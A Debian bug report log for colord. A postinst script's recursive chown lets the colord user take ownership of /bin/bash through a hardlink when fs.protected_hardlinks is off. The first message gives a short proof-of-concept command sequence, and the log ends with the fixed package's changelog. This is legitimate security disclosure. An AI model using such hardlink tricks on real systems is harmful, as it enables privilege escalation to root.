Debian Bug report logs - #889060
colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

Display info messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Ansgar Burchardt <ansgar@debian.org>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

Date: Thu, 01 Feb 2018 17:16:09 +0100

Package: colord
Version: 1.3.3-2
Severity: important
Tags: security

On systems with fs.protected_hardlinks=0 the postinst script allows
escalation from the colord user to root:

+---
| # sysctl fs.protected_hardlinks=0
| # runuser -u colord ln /bin/bash /var/lib/colord/bash
| # ls -l /bin/bash
| -rwxr-xr-x 2 root root 1099016 May 15  2017 /bin/bash
| # dpkg-reconfigure colord
| # ls -l /bin/bash
| -rwxr-xr-x 2 colord colord 1099016 May 15  2017 /bin/bash
+---

This is essentially the same problem as CVE-2017-18078.

Ansgar
  (now hoping every other `chmod -R` call gets a CVE assigned)

Message #10 received at 889060@bugs.debian.org (full text, mbox, reply):

From: Chris Lamb <lamby@debian.org>

To: 889060@bugs.debian.org

Cc: Ansgar Burchardt <ansgar@debian.org>

Subject: Re: colord.postinst: colord -> root escalation on systems with fs.protected_hardlinks=0

Date: Fri, 02 Feb 2018 13:49:12 +0530

Hi Ansgar,

> now hoping every other `chmod -R` call gets a CVE assigned

See #889066 for a Lintian check for this.


Regards,

-- 
      ,''`.
     : :'  :     Chris Lamb
     `. `'`      lamby@debian.org / chris-lamb.co.uk
       `-

Message #15 received at 889060-close@bugs.debian.org (full text, mbox, reply):

From: Christopher James Halse Rogers <raof@ubuntu.com>

To: 889060-close@bugs.debian.org

Subject: Bug#889060: fixed in colord 1.4.3-1

Date: Thu, 06 Sep 2018 18:04:00 +0000

Source: colord
Source-Version: 1.4.3-1

We believe that the bug you reported is fixed in the latest version of
colord, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 889060@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Christopher James Halse Rogers <raof@ubuntu.com> (supplier of updated colord package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Mon, 03 Sep 2018 17:53:23 +1000
Source: colord
Binary: libcolord-dev libcolord2 colord colord-sensor-argyll colord-data gir1.2-colord-1.0 libcolorhug-dev libcolorhug2 gir1.2-colorhug-1.0
Architecture: source
Version: 1.4.3-1
Distribution: unstable
Urgency: medium
Maintainer: Christopher James Halse Rogers <raof@ubuntu.com>
Changed-By: Christopher James Halse Rogers <raof@ubuntu.com>
Description:
 colord     - system service to manage device colour profiles -- system daemon
 colord-data - system service to manage device colour profiles -- data files
 colord-sensor-argyll - system service to manage device colour profiles -- argyll sensor
 gir1.2-colord-1.0 - GObject introspection data for the colord library
 gir1.2-colorhug-1.0 - GObject introspection data for the colorhug library
 libcolord-dev - system service to manage device colour profiles -- development fi
 libcolord2 - system service to manage device colour profiles -- runtime
 libcolorhug-dev - library to access the ColorHug colourimeter -- development files
 libcolorhug2 - library to access the ColorHug colourimeter -- runtime
Closes: 815252 889060 895102
Changes:
 colord (1.4.3-1) unstable; urgency=medium
 .
   * New upstream version 1.4.3
     - Switch to meson build system
     - New upstream version respects SOURCE_DATE_EPOCH for generated
       profiles, making the build reproducible! (Closes: 815252)
   * Switch to dh_missing
   * Fix order of adduser arguments in colord.postinst (Closes: 895102)
   * Drop chown -R usage in colord.postinst (Closes: 889060)
   * Refresh symbols files
   * Refresh .install files
   * debian/watch: Correctly identify as a Version=4 file.
   * Bump Standards-Version
Checksums-Sha1:
 fc55afff687b316e1660eb6b1f549ded10f2acfe 2818 colord_1.4.3-1.dsc
 a845fb51a54dda936d1a9696e30cc3d947bfa628 1858552 colord_1.4.3.orig.tar.xz
 c10cb2a218af4351fecd98e505fe363d0d003a9c 27932 colord_1.4.3-1.debian.tar.xz
Checksums-Sha256:
 8508f3480b2191c557b48a6ce77d3c2122475f125ac1eda7bf3c0f316c223936 2818 colord_1.4.3-1.dsc
 9a8e669ee1ea31632bee636cc57353f703c2ea9b64cd6e02bbaabe9a1e549df7 1858552 colord_1.4.3.orig.tar.xz
 2881afba1f8550da4f4083bfdd1a38ca98d6d0efa351405c04afd0d169de7fff 27932 colord_1.4.3-1.debian.tar.xz
Files:
 b6c85a817d304bbffd93fd769ba706ae 2818 graphics optional colord_1.4.3-1.dsc
 f032ecac927e9078c41fff97800441e8 1858552 graphics optional colord_1.4.3.orig.tar.xz
 5c7bb169b5b32707b87b58ea722e7105 27932 graphics optional colord_1.4.3-1.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJbkWlaAAoJED69RJA+2wSWxzYP/0ERvVqTi6lKGLoC7Bl3npun
VNZVgXP1T2eZqMeWLTPPLU9/cOIza3LXGfMkX3cAgAsRDRvyv+1HcFezgKwCLpSr
MZ2CGwNT1S6jlB1yTfpGTS+rLqIyLexuepehQNyrlObMeS+SXNqSA9/AxC4x3ZK9
ra5y4AcIW+fm7na0fykaFGUC0YbGJnjj3Nngh614C6Ww2815H4idKNzhtsE7RumI
+OZBPH31yWqNO25bC6376ogWMDqK2tJwIjnC/oLpVNxKOl4cQ45cYiQ2vXpf3BVd
OgMijTQYF3KX9zbBLeX+GuOVGueL9PkSHRuXM22zx/maeNCz8VfbwoNgnp5C5azW
e4aZk76n52aJTLSD7pNLUa9mbQHffFJ5k90ai+vEIfftiPdUFLSj4tSNM6QRvSSK
mEvMAaiWcmJis4l8YIklND2LquxcdXBLY0BRqwrtK5SLO53UlZ02wHUpdzUBnAY9
2IiJb+afcILCOatDjgQtsa872zCcvLguExATGnI0JrQ8vATyW6rGQF6Yp1SULl2k
YuCHwZUEMx4IcKSGPa2WD6IYL0TDi6IlHA4OENVX9RfVSHX0euKfB34St7fsjyZM
Nh8MSifJdVsYbXIkfI3nnquKHHUJwanlN+P/ZvhJB4qMOIwP14rQAFb+dPN5YSQs
GM/kAUiwv6/DdrNzs5X8
=Wrsx
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.